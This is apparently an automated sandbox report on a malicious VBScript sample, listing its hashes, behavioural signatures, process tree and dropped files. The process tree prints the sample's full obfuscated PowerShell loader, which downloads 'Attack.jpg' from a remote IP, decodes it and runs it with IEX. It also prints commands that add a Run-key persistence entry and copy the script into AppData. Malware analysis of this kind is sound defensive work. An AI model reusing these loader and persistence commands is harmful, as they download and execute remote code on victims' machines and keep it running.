Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14/05/2024, 17:43
Static task
static1
Behavioral task
behavioral1
Sample
425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
Resource
win10v2004-20240426-en
General
-
Target
425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
-
Size
9KB
-
MD5
425d9a1f5eb07f8ba4ed354c757bb72e
-
SHA1
c96f2b98374f7e2328f1e1ab80eed15fb6048198
-
SHA256
92a44d57e21fb7eb09cd897249ae3d2b3822f05f86846f9d3dfe9f750e96b362
-
SHA512
c68e905289f1c6311b32084e55015adb97451a183aa4c228f320957b4b2fccaf6a4fa930d880632e03d44d77e8ab5fb51014cf33c0cdafae1c5e179faf51ab86
-
SSDEEP
96:5W9ZUDRCWmCqm9RYs8A3CNiLUB2cZmNwMwGgSe3OhTy/33s1l/S:0ulhc0222zGgJ3OhTy/cS
Malware Config
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 1744 Powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3168 1744 Powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1220 1744 cmd.exe 83 -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 996 Powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs" Powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 996 Powershell.exe 3168 Powershell.exe 996 Powershell.exe 3168 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 996 Powershell.exe Token: SeDebugPrivilege 3168 Powershell.exe Token: SeIncreaseQuotaPrivilege 996 Powershell.exe Token: SeSecurityPrivilege 996 Powershell.exe Token: SeTakeOwnershipPrivilege 996 Powershell.exe Token: SeLoadDriverPrivilege 996 Powershell.exe Token: SeSystemProfilePrivilege 996 Powershell.exe Token: SeSystemtimePrivilege 996 Powershell.exe Token: SeProfSingleProcessPrivilege 996 Powershell.exe Token: SeIncBasePriorityPrivilege 996 Powershell.exe Token: SeCreatePagefilePrivilege 996 Powershell.exe Token: SeBackupPrivilege 996 Powershell.exe Token: SeRestorePrivilege 996 Powershell.exe Token: SeShutdownPrivilege 996 Powershell.exe Token: SeDebugPrivilege 996 Powershell.exe Token: SeSystemEnvironmentPrivilege 996 Powershell.exe Token: SeRemoteShutdownPrivilege 996 Powershell.exe Token: SeUndockPrivilege 996 Powershell.exe Token: SeManageVolumePrivilege 996 Powershell.exe Token: 33 996 Powershell.exe Token: 34 996 Powershell.exe Token: 35 996 Powershell.exe Token: 36 996 Powershell.exe Token: SeIncreaseQuotaPrivilege 996 Powershell.exe Token: SeSecurityPrivilege 996 Powershell.exe Token: SeTakeOwnershipPrivilege 996 Powershell.exe Token: SeLoadDriverPrivilege 996 Powershell.exe Token: SeSystemProfilePrivilege 996 Powershell.exe Token: SeSystemtimePrivilege 996 Powershell.exe Token: SeProfSingleProcessPrivilege 996 Powershell.exe Token: SeIncBasePriorityPrivilege 996 Powershell.exe Token: SeCreatePagefilePrivilege 996 Powershell.exe Token: SeBackupPrivilege 996 Powershell.exe Token: SeRestorePrivilege 996 Powershell.exe Token: SeShutdownPrivilege 996 Powershell.exe Token: SeDebugPrivilege 996 Powershell.exe Token: SeSystemEnvironmentPrivilege 996 Powershell.exe Token: SeRemoteShutdownPrivilege 996 Powershell.exe Token: SeUndockPrivilege 996 Powershell.exe Token: SeManageVolumePrivilege 996 Powershell.exe Token: 33 996 Powershell.exe Token: 34 996 Powershell.exe Token: 35 996 Powershell.exe Token: 36 996 Powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs"1⤵PID:1420
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$suXMbuGywgFCLg=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,98,111,110,101,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,112,50,50,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,112,50,50,59,36,116,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,116,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,49,56,53,46,50,52,50,46,49,48,53,46,49,49,54,47,117,116,110,108,47,65,116,116,97,99,107,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,116,46,115,101,110,100,40,41,59,36,116,121,61,36,116,46,114,101,115,112,111,110,115,101,84,101,120,116,59,36,97,115,99,105,105,67,104,97,114,115,61,32,36,116,121,32,45,115,112,108,105,116,32,39,45,39,32,124,70,111,114,69,97,99,104,45,79,98,106,101,99,116,32,123,91,99,104,97,114,93,91,98,121,116,101,93,34,48,120,36,95,34,125,59,36,97,115,99,105,105,83,116,114,105,110,103,61,32,36,97,115,99,105,105,67,104,97,114,115,32,45,106,111,105,110,32,39,39,124,77);[char[]]$suXMbuGywgFCLg -join ''|c`M`11⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:996
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Microsoft\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs'1⤵
- Process spawned unexpected child process
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
C:\Windows\system32\cmd.execmd /c copy "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y1⤵
- Process spawned unexpected child process
PID:1220
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82